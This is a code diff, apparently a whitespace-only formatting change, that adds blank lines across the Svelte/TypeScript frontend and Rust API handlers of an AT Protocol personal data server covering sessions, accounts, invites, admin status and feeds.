+11
frontend/src/App.svelte
+11
frontend/src/App.svelte
···
9
9
import Settings from './routes/Settings.svelte'
10
10
import Notifications from './routes/Notifications.svelte'
11
11
import RepoExplorer from './routes/RepoExplorer.svelte'
12
+
12
13
const auth = getAuthState()
14
+
13
15
$effect(() => {
14
16
initAuth()
15
17
})
18
+
16
19
function getComponent(path: string) {
17
20
switch (path) {
18
21
case '/login':
···
35
38
return auth.session ? Dashboard : Login
36
39
}
37
40
}
41
+
38
42
let currentPath = $derived(getCurrentPath())
39
43
let CurrentComponent = $derived(getComponent(currentPath))
40
44
</script>
45
+
41
46
<main>
42
47
{#if auth.loading}
43
48
<div class="loading">
···
47
52
<CurrentComponent />
48
53
{/if}
49
54
</main>
55
+
50
56
<style>
51
57
:global(:root) {
52
58
--bg-primary: #fafafa;
···
70
76
--warning-bg: #ffd;
71
77
--warning-text: #660;
72
78
}
79
+
73
80
@media (prefers-color-scheme: dark) {
74
81
:global(:root) {
75
82
--bg-primary: #1a1a1a;
···
94
101
--warning-text: #c6c67b;
95
102
}
96
103
}
104
+
97
105
:global(body) {
98
106
margin: 0;
99
107
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
···
101
109
color: var(--text-primary);
102
110
background: var(--bg-primary);
103
111
}
112
+
104
113
:global(*) {
105
114
box-sizing: border-box;
106
115
}
116
+
107
117
main {
108
118
min-height: 100vh;
109
119
background: var(--bg-primary);
110
120
}
121
+
111
122
.loading {
112
123
display: flex;
113
124
align-items: center;
+37
frontend/src/lib/api.ts
+37
frontend/src/lib/api.ts
···
1
1
const API_BASE = '/xrpc'
2
+
2
3
export class ApiError extends Error {
3
4
public did?: string
4
5
constructor(public status: number, public error: string, message: string, did?: string) {
···
7
8
this.did = did
8
9
}
9
10
}
11
+
10
12
async function xrpc<T>(method: string, options?: {
11
13
method?: 'GET' | 'POST'
12
14
params?: Record<string, string>
···
37
39
}
38
40
return res.json()
39
41
}
42
+
40
43
export interface Session {
41
44
did: string
42
45
handle: string
···
47
50
accessJwt: string
48
51
refreshJwt: string
49
52
}
53
+
50
54
export interface AppPassword {
51
55
name: string
52
56
createdAt: string
53
57
}
58
+
54
59
export interface InviteCode {
55
60
code: string
56
61
available: number
···
60
65
createdAt: string
61
66
uses: { usedBy: string; usedAt: string }[]
62
67
}
68
+
63
69
export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal'
70
+
64
71
export interface CreateAccountParams {
65
72
handle: string
66
73
email: string
···
71
78
telegramUsername?: string
72
79
signalNumber?: string
73
80
}
81
+
74
82
export interface CreateAccountResult {
75
83
handle: string
76
84
did: string
77
85
verificationRequired: boolean
78
86
verificationChannel: string
79
87
}
88
+
80
89
export interface ConfirmSignupResult {
81
90
accessJwt: string
82
91
refreshJwt: string
···
87
96
preferredChannel?: string
88
97
preferredChannelVerified?: boolean
89
98
}
99
+
90
100
export const api = {
91
101
async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> {
92
102
return xrpc('com.atproto.server.createAccount', {
···
103
113
},
104
114
})
105
115
},
116
+
106
117
async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> {
107
118
return xrpc('com.atproto.server.confirmSignup', {
108
119
method: 'POST',
109
120
body: { did, verificationCode },
110
121
})
111
122
},
123
+
112
124
async resendVerification(did: string): Promise<{ success: boolean }> {
113
125
return xrpc('com.atproto.server.resendVerification', {
114
126
method: 'POST',
115
127
body: { did },
116
128
})
117
129
},
130
+
118
131
async createSession(identifier: string, password: string): Promise<Session> {
119
132
return xrpc('com.atproto.server.createSession', {
120
133
method: 'POST',
121
134
body: { identifier, password },
122
135
})
123
136
},
137
+
124
138
async getSession(token: string): Promise<Session> {
125
139
return xrpc('com.atproto.server.getSession', { token })
126
140
},
141
+
127
142
async refreshSession(refreshJwt: string): Promise<Session> {
128
143
return xrpc('com.atproto.server.refreshSession', {
129
144
method: 'POST',
130
145
token: refreshJwt,
131
146
})
132
147
},
148
+
133
149
async deleteSession(token: string): Promise<void> {
134
150
await xrpc('com.atproto.server.deleteSession', {
135
151
method: 'POST',
136
152
token,
137
153
})
138
154
},
155
+
139
156
async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> {
140
157
return xrpc('com.atproto.server.listAppPasswords', { token })
141
158
},
159
+
142
160
async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> {
143
161
return xrpc('com.atproto.server.createAppPassword', {
144
162
method: 'POST',
···
146
164
body: { name },
147
165
})
148
166
},
167
+
149
168
async revokeAppPassword(token: string, name: string): Promise<void> {
150
169
await xrpc('com.atproto.server.revokeAppPassword', {
151
170
method: 'POST',
···
153
172
body: { name },
154
173
})
155
174
},
175
+
156
176
async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> {
157
177
return xrpc('com.atproto.server.getAccountInviteCodes', { token })
158
178
},
179
+
159
180
async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> {
160
181
return xrpc('com.atproto.server.createInviteCode', {
161
182
method: 'POST',
···
163
184
body: { useCount },
164
185
})
165
186
},
187
+
166
188
async requestPasswordReset(email: string): Promise<void> {
167
189
await xrpc('com.atproto.server.requestPasswordReset', {
168
190
method: 'POST',
169
191
body: { email },
170
192
})
171
193
},
194
+
172
195
async resetPassword(token: string, password: string): Promise<void> {
173
196
await xrpc('com.atproto.server.resetPassword', {
174
197
method: 'POST',
175
198
body: { token, password },
176
199
})
177
200
},
201
+
178
202
async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> {
179
203
return xrpc('com.atproto.server.requestEmailUpdate', {
180
204
method: 'POST',
181
205
token,
182
206
})
183
207
},
208
+
184
209
async updateEmail(token: string, email: string, emailToken?: string): Promise<void> {
185
210
await xrpc('com.atproto.server.updateEmail', {
186
211
method: 'POST',
···
188
213
body: { email, token: emailToken },
189
214
})
190
215
},
216
+
191
217
async updateHandle(token: string, handle: string): Promise<void> {
192
218
await xrpc('com.atproto.identity.updateHandle', {
193
219
method: 'POST',
···
195
221
body: { handle },
196
222
})
197
223
},
224
+
198
225
async requestAccountDelete(token: string): Promise<void> {
199
226
await xrpc('com.atproto.server.requestAccountDelete', {
200
227
method: 'POST',
201
228
token,
202
229
})
203
230
},
231
+
204
232
async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> {
205
233
await xrpc('com.atproto.server.deleteAccount', {
206
234
method: 'POST',
207
235
body: { did, password, token: deleteToken },
208
236
})
209
237
},
238
+
210
239
async describeServer(): Promise<{
211
240
availableUserDomains: string[]
212
241
inviteCodeRequired: boolean
···
214
243
}> {
215
244
return xrpc('com.atproto.server.describeServer')
216
245
},
246
+
217
247
async getNotificationPrefs(token: string): Promise<{
218
248
preferredChannel: string
219
249
email: string
···
226
256
}> {
227
257
return xrpc('com.bspds.account.getNotificationPrefs', { token })
228
258
},
259
+
229
260
async updateNotificationPrefs(token: string, prefs: {
230
261
preferredChannel?: string
231
262
discordId?: string
···
238
269
body: prefs,
239
270
})
240
271
},
272
+
241
273
async describeRepo(token: string, repo: string): Promise<{
242
274
handle: string
243
275
did: string
···
250
282
params: { repo },
251
283
})
252
284
},
285
+
253
286
async listRecords(token: string, repo: string, collection: string, options?: {
254
287
limit?: number
255
288
cursor?: string
···
264
297
if (options?.reverse) params.reverse = 'true'
265
298
return xrpc('com.atproto.repo.listRecords', { token, params })
266
299
},
300
+
267
301
async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{
268
302
uri: string
269
303
cid: string
···
274
308
params: { repo, collection, rkey },
275
309
})
276
310
},
311
+
277
312
async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{
278
313
uri: string
279
314
cid: string
···
284
319
body: { repo, collection, record, rkey },
285
320
})
286
321
},
322
+
287
323
async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{
288
324
uri: string
289
325
cid: string
···
294
330
body: { repo, collection, rkey, record },
295
331
})
296
332
},
333
+
297
334
async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> {
298
335
await xrpc('com.atproto.repo.deleteRecord', {
299
336
method: 'POST',
+16
frontend/src/lib/auth.svelte.ts
+16
frontend/src/lib/auth.svelte.ts
···
1
1
import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api'
2
+
2
3
const STORAGE_KEY = 'bspds_session'
4
+
3
5
interface AuthState {
4
6
session: Session | null
5
7
loading: boolean
6
8
error: string | null
7
9
}
10
+
8
11
let state = $state<AuthState>({
9
12
session: null,
10
13
loading: true,
11
14
error: null,
12
15
})
16
+
13
17
function saveSession(session: Session | null) {
14
18
if (session) {
15
19
localStorage.setItem(STORAGE_KEY, JSON.stringify(session))
···
17
21
localStorage.removeItem(STORAGE_KEY)
18
22
}
19
23
}
24
+
20
25
function loadSession(): Session | null {
21
26
const stored = localStorage.getItem(STORAGE_KEY)
22
27
if (stored) {
···
28
33
}
29
34
return null
30
35
}
36
+
31
37
export async function initAuth() {
32
38
state.loading = true
33
39
state.error = null
···
54
60
}
55
61
state.loading = false
56
62
}
63
+
57
64
export async function login(identifier: string, password: string): Promise<void> {
58
65
state.loading = true
59
66
state.error = null
···
72
79
state.loading = false
73
80
}
74
81
}
82
+
75
83
export async function register(params: CreateAccountParams): Promise<CreateAccountResult> {
76
84
try {
77
85
const result = await api.createAccount(params)
···
85
93
throw e
86
94
}
87
95
}
96
+
88
97
export async function confirmSignup(did: string, verificationCode: string): Promise<void> {
89
98
state.loading = true
90
99
state.error = null
···
113
122
state.loading = false
114
123
}
115
124
}
125
+
116
126
export async function resendVerification(did: string): Promise<void> {
117
127
try {
118
128
await api.resendVerification(did)
···
123
133
throw new Error('Failed to resend verification code')
124
134
}
125
135
}
136
+
126
137
export async function logout(): Promise<void> {
127
138
if (state.session) {
128
139
try {
···
134
145
state.session = null
135
146
saveSession(null)
136
147
}
148
+
137
149
export function getAuthState() {
138
150
return state
139
151
}
152
+
140
153
export function getToken(): string | null {
141
154
return state.session?.accessJwt ?? null
142
155
}
156
+
143
157
export function isAuthenticated(): boolean {
144
158
return state.session !== null
145
159
}
160
+
146
161
export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) {
147
162
state.session = newState.session
148
163
state.loading = newState.loading
149
164
state.error = newState.error
150
165
}
166
+
151
167
export function _testReset() {
152
168
state.session = null
153
169
state.loading = true
+3
frontend/src/lib/router.svelte.ts
+3
frontend/src/lib/router.svelte.ts
···
1
1
let currentPath = $state(window.location.hash.slice(1) || '/')
2
+
2
3
window.addEventListener('hashchange', () => {
3
4
currentPath = window.location.hash.slice(1) || '/'
4
5
})
6
+
5
7
export function navigate(path: string) {
6
8
window.location.hash = path
7
9
}
10
+
8
11
export function getCurrentPath() {
9
12
return currentPath
10
13
}
+2
frontend/src/main.ts
+2
frontend/src/main.ts
+4
frontend/src/tests/setup.ts
+4
frontend/src/tests/setup.ts
···
1
1
import '@testing-library/jest-dom/vitest'
2
2
import { vi, beforeEach, afterEach } from 'vitest'
3
3
import { _testReset } from '../lib/auth.svelte'
4
+
4
5
let locationHash = ''
6
+
5
7
Object.defineProperty(window, 'location', {
6
8
value: {
7
9
get hash() { return locationHash },
···
19
21
writable: true,
20
22
configurable: true,
21
23
})
24
+
22
25
beforeEach(() => {
23
26
vi.clearAllMocks()
24
27
localStorage.clear()
···
26
29
locationHash = ''
27
30
_testReset()
28
31
})
32
+
29
33
afterEach(() => {
30
34
vi.restoreAllMocks()
31
35
})
+7
frontend/src/tests/utils.ts
+7
frontend/src/tests/utils.ts
···
1
1
import { render, type RenderResult } from '@testing-library/svelte'
2
2
import { tick } from 'svelte'
3
3
import type { ComponentType } from 'svelte'
4
+
4
5
export async function renderAndWait<T extends ComponentType>(
5
6
component: T,
6
7
options?: Parameters<typeof render>[1]
···
10
11
await new Promise(resolve => setTimeout(resolve, 0))
11
12
return result
12
13
}
14
+
13
15
export async function waitForElement(
14
16
queryFn: () => HTMLElement | null,
15
17
timeout = 1000
···
22
24
}
23
25
throw new Error('Element not found within timeout')
24
26
}
27
+
25
28
export async function waitForElementToDisappear(
26
29
queryFn: () => HTMLElement | null,
27
30
timeout = 1000
···
34
37
}
35
38
throw new Error('Element still present after timeout')
36
39
}
40
+
37
41
export async function waitForText(
38
42
container: HTMLElement,
39
43
text: string | RegExp,
···
49
53
}
50
54
throw new Error(`Text "${text}" not found within timeout`)
51
55
}
56
+
52
57
export function mockLocalStorage(initialData: Record<string, string> = {}): void {
53
58
const store: Record<string, string> = { ...initialData }
54
59
Object.defineProperty(window, 'localStorage', {
···
63
68
writable: true,
64
69
})
65
70
}
71
+
66
72
export function setAuthState(session: {
67
73
did: string
68
74
handle: string
···
73
79
}): void {
74
80
localStorage.setItem('session', JSON.stringify(session))
75
81
}
82
+
76
83
export function clearAuthState(): void {
77
84
localStorage.removeItem('session')
78
85
}
+1
src/api/actor/mod.rs
+1
src/api/actor/mod.rs
+3
src/api/actor/preferences.rs
+3
src/api/actor/preferences.rs
···
7
7
};
8
8
use serde::{Deserialize, Serialize};
9
9
use serde_json::{json, Value};
10
+
10
11
const APP_BSKY_NAMESPACE: &str = "app.bsky";
11
12
const MAX_PREFERENCES_COUNT: usize = 100;
12
13
const MAX_PREFERENCE_SIZE: usize = 10_000;
14
+
13
15
#[derive(Serialize)]
14
16
pub struct GetPreferencesOutput {
15
17
pub preferences: Vec<Value>,
···
84
86
.collect();
85
87
(StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response()
86
88
}
89
+
87
90
#[derive(Deserialize)]
88
91
pub struct PutPreferencesInput {
89
92
pub preferences: Vec<Value>,
+9
src/api/actor/profile.rs
+9
src/api/actor/profile.rs
···
11
11
use serde_json::{json, Value};
12
12
use std::collections::HashMap;
13
13
use tracing::{error, info};
14
+
14
15
#[derive(Deserialize)]
15
16
pub struct GetProfileParams {
16
17
pub actor: String,
17
18
}
19
+
18
20
#[derive(Deserialize)]
19
21
pub struct GetProfilesParams {
20
22
pub actors: String,
21
23
}
24
+
22
25
#[derive(Serialize, Deserialize, Clone)]
23
26
#[serde(rename_all = "camelCase")]
24
27
pub struct ProfileViewDetailed {
···
35
38
#[serde(flatten)]
36
39
pub extra: HashMap<String, Value>,
37
40
}
41
+
38
42
#[derive(Serialize, Deserialize)]
39
43
pub struct GetProfilesOutput {
40
44
pub profiles: Vec<ProfileViewDetailed>,
41
45
}
46
+
42
47
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
43
48
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
44
49
.fetch_optional(&state.db)
···
55
60
let block_bytes = state.block_store.get(&cid).await.ok()??;
56
61
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
57
62
}
63
+
58
64
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
59
65
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
60
66
profile.display_name = Some(display_name.to_string());
···
63
69
profile.description = Some(description.to_string());
64
70
}
65
71
}
72
+
66
73
async fn proxy_to_appview(
67
74
method: &str,
68
75
params: &HashMap<String, String>,
···
104
111
}
105
112
}
106
113
}
114
+
107
115
pub async fn get_profile(
108
116
State(state): State<AppState>,
109
117
headers: axum::http::HeaderMap,
···
146
154
}
147
155
(StatusCode::OK, Json(profile)).into_response()
148
156
}
157
+
149
158
pub async fn get_profiles(
150
159
State(state): State<AppState>,
151
160
headers: axum::http::HeaderMap,
+2
src/api/admin/account/delete.rs
+2
src/api/admin/account/delete.rs
···
8
8
use serde::Deserialize;
9
9
use serde_json::json;
10
10
use tracing::{error, warn};
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct DeleteAccountInput {
13
14
pub did: String,
14
15
}
16
+
15
17
pub async fn delete_account(
16
18
State(state): State<AppState>,
17
19
headers: axum::http::HeaderMap,
+3
src/api/admin/account/email.rs
+3
src/api/admin/account/email.rs
···
8
8
use serde::{Deserialize, Serialize};
9
9
use serde_json::json;
10
10
use tracing::{error, warn};
11
+
11
12
#[derive(Deserialize)]
12
13
#[serde(rename_all = "camelCase")]
13
14
pub struct SendEmailInput {
···
17
18
pub subject: Option<String>,
18
19
pub comment: Option<String>,
19
20
}
21
+
20
22
#[derive(Serialize)]
21
23
pub struct SendEmailOutput {
22
24
pub sent: bool,
23
25
}
26
+
24
27
pub async fn send_email(
25
28
State(state): State<AppState>,
26
29
headers: axum::http::HeaderMap,
+6
src/api/admin/account/info.rs
+6
src/api/admin/account/info.rs
···
8
8
use serde::{Deserialize, Serialize};
9
9
use serde_json::json;
10
10
use tracing::error;
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct GetAccountInfoParams {
13
14
pub did: String,
14
15
}
16
+
15
17
#[derive(Serialize)]
16
18
#[serde(rename_all = "camelCase")]
17
19
pub struct AccountInfo {
···
24
26
pub email_confirmed_at: Option<String>,
25
27
pub deactivated_at: Option<String>,
26
28
}
29
+
27
30
#[derive(Serialize)]
28
31
#[serde(rename_all = "camelCase")]
29
32
pub struct GetAccountInfosOutput {
30
33
pub infos: Vec<AccountInfo>,
31
34
}
35
+
32
36
pub async fn get_account_info(
33
37
State(state): State<AppState>,
34
38
headers: axum::http::HeaderMap,
···
92
96
}
93
97
}
94
98
}
99
+
95
100
#[derive(Deserialize)]
96
101
pub struct GetAccountInfosParams {
97
102
pub dids: String,
98
103
}
104
+
99
105
pub async fn get_account_infos(
100
106
State(state): State<AppState>,
101
107
headers: axum::http::HeaderMap,
+1
src/api/admin/account/mod.rs
+1
src/api/admin/account/mod.rs
+6
src/api/admin/account/update.rs
+6
src/api/admin/account/update.rs
···
8
8
use serde::Deserialize;
9
9
use serde_json::json;
10
10
use tracing::error;
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct UpdateAccountEmailInput {
13
14
pub account: String,
14
15
pub email: String,
15
16
}
17
+
16
18
pub async fn update_account_email(
17
19
State(state): State<AppState>,
18
20
headers: axum::http::HeaderMap,
···
59
61
}
60
62
}
61
63
}
64
+
62
65
#[derive(Deserialize)]
63
66
pub struct UpdateAccountHandleInput {
64
67
pub did: String,
65
68
pub handle: String,
66
69
}
70
+
67
71
pub async fn update_account_handle(
68
72
State(state): State<AppState>,
69
73
headers: axum::http::HeaderMap,
···
139
143
}
140
144
}
141
145
}
146
+
142
147
#[derive(Deserialize)]
143
148
pub struct UpdateAccountPasswordInput {
144
149
pub did: String,
145
150
pub password: String,
146
151
}
152
+
147
153
pub async fn update_account_password(
148
154
State(state): State<AppState>,
149
155
headers: axum::http::HeaderMap,
+11
src/api/admin/invite.rs
+11
src/api/admin/invite.rs
···
8
8
use serde::{Deserialize, Serialize};
9
9
use serde_json::json;
10
10
use tracing::error;
11
+
11
12
#[derive(Deserialize)]
12
13
#[serde(rename_all = "camelCase")]
13
14
pub struct DisableInviteCodesInput {
14
15
pub codes: Option<Vec<String>>,
15
16
pub accounts: Option<Vec<String>>,
16
17
}
18
+
17
19
pub async fn disable_invite_codes(
18
20
State(state): State<AppState>,
19
21
headers: axum::http::HeaderMap,
···
51
53
}
52
54
(StatusCode::OK, Json(json!({}))).into_response()
53
55
}
56
+
54
57
#[derive(Deserialize)]
55
58
pub struct GetInviteCodesParams {
56
59
pub sort: Option<String>,
57
60
pub limit: Option<i64>,
58
61
pub cursor: Option<String>,
59
62
}
63
+
60
64
#[derive(Serialize)]
61
65
#[serde(rename_all = "camelCase")]
62
66
pub struct InviteCodeInfo {
···
68
72
pub created_at: String,
69
73
pub uses: Vec<InviteCodeUseInfo>,
70
74
}
75
+
71
76
#[derive(Serialize)]
72
77
#[serde(rename_all = "camelCase")]
73
78
pub struct InviteCodeUseInfo {
74
79
pub used_by: String,
75
80
pub used_at: String,
76
81
}
82
+
77
83
#[derive(Serialize)]
78
84
pub struct GetInviteCodesOutput {
79
85
pub cursor: Option<String>,
80
86
pub codes: Vec<InviteCodeInfo>,
81
87
}
88
+
82
89
pub async fn get_invite_codes(
83
90
State(state): State<AppState>,
84
91
headers: axum::http::HeaderMap,
···
192
199
)
193
200
.into_response()
194
201
}
202
+
195
203
#[derive(Deserialize)]
196
204
pub struct DisableAccountInvitesInput {
197
205
pub account: String,
198
206
}
207
+
199
208
pub async fn disable_account_invites(
200
209
State(state): State<AppState>,
201
210
headers: axum::http::HeaderMap,
···
241
250
}
242
251
}
243
252
}
253
+
244
254
#[derive(Deserialize)]
245
255
pub struct EnableAccountInvitesInput {
246
256
pub account: String,
247
257
}
258
+
248
259
pub async fn enable_account_invites(
249
260
State(state): State<AppState>,
250
261
headers: axum::http::HeaderMap,
+1
src/api/admin/mod.rs
+1
src/api/admin/mod.rs
+7
src/api/admin/status.rs
+7
src/api/admin/status.rs
···
8
8
use serde::{Deserialize, Serialize};
9
9
use serde_json::json;
10
10
use tracing::{error, warn};
11
+
11
12
#[derive(Deserialize)]
12
13
pub struct GetSubjectStatusParams {
13
14
pub did: Option<String>,
14
15
pub uri: Option<String>,
15
16
pub blob: Option<String>,
16
17
}
18
+
17
19
#[derive(Serialize)]
18
20
pub struct SubjectStatus {
19
21
pub subject: serde_json::Value,
20
22
pub takedown: Option<StatusAttr>,
21
23
pub deactivated: Option<StatusAttr>,
22
24
}
25
+
23
26
#[derive(Serialize)]
24
27
#[serde(rename_all = "camelCase")]
25
28
pub struct StatusAttr {
26
29
pub applied: bool,
27
30
pub r#ref: Option<String>,
28
31
}
32
+
29
33
pub async fn get_subject_status(
30
34
State(state): State<AppState>,
31
35
headers: axum::http::HeaderMap,
···
184
188
)
185
189
.into_response()
186
190
}
191
+
187
192
#[derive(Deserialize)]
188
193
#[serde(rename_all = "camelCase")]
189
194
pub struct UpdateSubjectStatusInput {
···
191
196
pub takedown: Option<StatusAttrInput>,
192
197
pub deactivated: Option<StatusAttrInput>,
193
198
}
199
+
194
200
#[derive(Deserialize)]
195
201
pub struct StatusAttrInput {
196
202
pub apply: bool,
197
203
pub r#ref: Option<String>,
198
204
}
205
+
199
206
pub async fn update_subject_status(
200
207
State(state): State<AppState>,
201
208
headers: axum::http::HeaderMap,
+7
src/api/error.rs
+7
src/api/error.rs
···
4
4
response::{IntoResponse, Response},
5
5
};
6
6
use serde::Serialize;
7
+
7
8
#[derive(Debug, Serialize)]
8
9
struct ErrorBody {
9
10
error: &'static str,
10
11
#[serde(skip_serializing_if = "Option::is_none")]
11
12
message: Option<String>,
12
13
}
14
+
13
15
#[derive(Debug)]
14
16
pub enum ApiError {
15
17
InternalError,
···
46
48
UpstreamUnavailable(String),
47
49
UpstreamError { status: u16, error: Option<String>, message: Option<String> },
48
50
}
51
+
49
52
impl ApiError {
50
53
fn status_code(&self) -> StatusCode {
51
54
match self {
···
144
147
Self::UpstreamError { status, error: None, message: None }
145
148
}
146
149
}
150
+
147
151
impl IntoResponse for ApiError {
148
152
fn into_response(self) -> Response {
149
153
let body = ErrorBody {
···
153
157
(self.status_code(), Json(body)).into_response()
154
158
}
155
159
}
160
+
156
161
impl From<sqlx::Error> for ApiError {
157
162
fn from(e: sqlx::Error) -> Self {
158
163
tracing::error!("Database error: {:?}", e);
159
164
Self::DatabaseError
160
165
}
161
166
}
167
+
162
168
impl From<crate::auth::TokenValidationError> for ApiError {
163
169
fn from(e: crate::auth::TokenValidationError) -> Self {
164
170
match e {
···
169
175
}
170
176
}
171
177
}
178
+
172
179
impl From<crate::util::DbLookupError> for ApiError {
173
180
fn from(e: crate::util::DbLookupError) -> Self {
174
181
match e {
+3
src/api/feed/actor_likes.rs
+3
src/api/feed/actor_likes.rs
···
13
13
use serde_json::Value;
14
14
use std::collections::HashMap;
15
15
use tracing::warn;
16
+
16
17
#[derive(Deserialize)]
17
18
pub struct GetActorLikesParams {
18
19
pub actor: String,
19
20
pub limit: Option<u32>,
20
21
pub cursor: Option<String>,
21
22
}
23
+
22
24
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
23
25
for like in likes {
24
26
let like_time = &like.indexed_at.to_rfc3339();
···
57
59
);
58
60
}
59
61
}
62
+
60
63
pub async fn get_actor_likes(
61
64
State(state): State<AppState>,
62
65
headers: axum::http::HeaderMap,
+2
src/api/feed/custom_feed.rs
+2
src/api/feed/custom_feed.rs
···
11
11
use serde::Deserialize;
12
12
use std::collections::HashMap;
13
13
use tracing::{error, info};
14
+
14
15
#[derive(Deserialize)]
15
16
pub struct GetFeedParams {
16
17
pub feed: String,
17
18
pub limit: Option<u32>,
18
19
pub cursor: Option<String>,
19
20
}
21
+
20
22
pub async fn get_feed(
21
23
State(state): State<AppState>,
22
24
headers: axum::http::HeaderMap,
+1
src/api/feed/mod.rs
+1
src/api/feed/mod.rs
+10
src/api/feed/post_thread.rs
+10
src/api/feed/post_thread.rs
···
13
13
use serde_json::{json, Value};
14
14
use std::collections::HashMap;
15
15
use tracing::warn;
16
+
16
17
#[derive(Deserialize)]
17
18
pub struct GetPostThreadParams {
18
19
pub uri: String,
···
20
21
#[serde(rename = "parentHeight")]
21
22
pub parent_height: Option<u32>,
22
23
}
24
+
23
25
#[derive(Debug, Clone, Serialize, Deserialize)]
24
26
#[serde(rename_all = "camelCase")]
25
27
pub struct ThreadViewPost {
···
33
35
#[serde(flatten)]
34
36
pub extra: HashMap<String, Value>,
35
37
}
38
+
36
39
#[derive(Debug, Clone, Serialize, Deserialize)]
37
40
#[serde(untagged)]
38
41
pub enum ThreadNode {
···
40
43
NotFound(ThreadNotFound),
41
44
Blocked(ThreadBlocked),
42
45
}
46
+
43
47
#[derive(Debug, Clone, Serialize, Deserialize)]
44
48
#[serde(rename_all = "camelCase")]
45
49
pub struct ThreadNotFound {
···
48
52
pub uri: String,
49
53
pub not_found: bool,
50
54
}
55
+
51
56
#[derive(Debug, Clone, Serialize, Deserialize)]
52
57
#[serde(rename_all = "camelCase")]
53
58
pub struct ThreadBlocked {
···
57
62
pub blocked: bool,
58
63
pub author: Value,
59
64
}
65
+
60
66
#[derive(Debug, Clone, Serialize, Deserialize)]
61
67
pub struct PostThreadOutput {
62
68
pub thread: ThreadNode,
63
69
#[serde(skip_serializing_if = "Option::is_none")]
64
70
pub threadgate: Option<Value>,
65
71
}
72
+
66
73
const MAX_THREAD_DEPTH: usize = 10;
74
+
67
75
fn add_replies_to_thread(
68
76
thread: &mut ThreadViewPost,
69
77
local_posts: &[RecordDescript<PostRecord>],
···
111
119
}
112
120
}
113
121
}
122
+
114
123
pub async fn get_post_thread(
115
124
State(state): State<AppState>,
116
125
headers: axum::http::HeaderMap,
···
190
199
let lag = get_local_lag(&local_records);
191
200
format_munged_response(thread_output, lag)
192
201
}
202
+
193
203
async fn handle_not_found(
194
204
state: &AppState,
195
205
uri: &str,
+4
src/api/feed/timeline.rs
+4
src/api/feed/timeline.rs
···
15
15
use serde_json::{json, Value};
16
16
use std::collections::HashMap;
17
17
use tracing::warn;
18
+
18
19
#[derive(Deserialize)]
19
20
pub struct GetTimelineParams {
20
21
pub algorithm: Option<String>,
21
22
pub limit: Option<u32>,
22
23
pub cursor: Option<String>,
23
24
}
25
+
24
26
pub async fn get_timeline(
25
27
State(state): State<AppState>,
26
28
headers: axum::http::HeaderMap,
···
56
58
}
57
59
get_timeline_local_only(&state, &auth_user.did).await
58
60
}
61
+
59
62
async fn get_timeline_with_appview(
60
63
state: &AppState,
61
64
headers: &axum::http::HeaderMap,
···
123
126
let lag = get_local_lag(&local_records);
124
127
format_munged_response(feed_output, lag)
125
128
}
129
+
126
130
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
127
131
let user_id: uuid::Uuid = match sqlx::query_scalar!(
128
132
"SELECT id FROM users WHERE did = $1",
+4
src/api/identity/account.rs
+4
src/api/identity/account.rs
···
16
16
use serde_json::json;
17
17
use std::sync::Arc;
18
18
use tracing::{error, info, warn};
19
+
19
20
fn extract_client_ip(headers: &HeaderMap) -> String {
20
21
if let Some(forwarded) = headers.get("x-forwarded-for") {
21
22
if let Ok(value) = forwarded.to_str() {
···
31
32
}
32
33
"unknown".to_string()
33
34
}
35
+
34
36
#[derive(Deserialize)]
35
37
#[serde(rename_all = "camelCase")]
36
38
pub struct CreateAccountInput {
···
45
47
pub telegram_username: Option<String>,
46
48
pub signal_number: Option<String>,
47
49
}
50
+
48
51
#[derive(Serialize)]
49
52
#[serde(rename_all = "camelCase")]
50
53
pub struct CreateAccountOutput {
···
53
56
pub verification_required: bool,
54
57
pub verification_channel: String,
55
58
}
59
+
56
60
pub async fn create_account(
57
61
State(state): State<AppState>,
58
62
headers: HeaderMap,
+14
src/api/identity/did.rs
+14
src/api/identity/did.rs
···
13
13
use serde::Deserialize;
14
14
use serde_json::json;
15
15
use tracing::{error, warn};
16
+
16
17
#[derive(Deserialize)]
17
18
pub struct ResolveHandleParams {
18
19
pub handle: String,
19
20
}
21
+
20
22
pub async fn resolve_handle(
21
23
State(state): State<AppState>,
22
24
Query(params): Query<ResolveHandleParams>,
···
63
65
}
64
66
}
65
67
}
68
+
66
69
pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> {
67
70
let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?;
68
71
let public_key = secret_key.public_key();
···
78
81
"y": y_b64
79
82
}))
80
83
}
84
+
81
85
pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse {
82
86
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
83
87
// Kinda for local dev, encode hostname if it contains port
···
96
100
}]
97
101
}))
98
102
}
103
+
99
104
pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response {
100
105
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
101
106
